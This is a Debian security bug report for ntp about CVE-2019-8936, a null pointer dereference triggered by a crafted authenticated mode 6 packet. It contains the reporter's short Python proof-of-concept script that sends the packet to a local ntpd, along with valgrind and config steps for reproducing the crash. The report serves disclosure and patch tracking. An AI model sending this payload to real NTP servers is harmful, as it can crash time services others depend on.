Source: ntp
Version: 1:4.2.8p12+dfsg-3
Severity: important
Tags: security upstream
Forwarded: http://bugs.ntp.org/show_bug.cgi?id=3565
Hi,
The following vulnerability was published for ntp.
CVE-2019-8936[0]:
Crafted null dereference attack in authenticated mode 6 packet
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
To verify/illustrate the issue/fix one can use the following as
provided by the reporter in the upstream report:
#!/usr/bin/env python
import sys
import socket
buf =
("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
"\x56\xc8\x07\xd4")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
and running ntpd uder valgrind as
valgrind ntpd -n -c ~/resources/ntp.conf
with ntp.conf:
logfile /tmp/ntp.log
restrict 127.0.0.1
keys /path/to/keys
trustedkey 1
controlkey 1
requestkey 1
and keys
1 M gurka
2 M agurk
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2019-8936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936
[1] http://bugs.ntp.org/show_bug.cgi?id=3565
[2]
http://bk.ntp.org/ntp-stable/ntpd/ntp_control.c?PAGE=diffs&REV=5c8106e7wWtXdh0lzg1ytlWribBTcQ
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
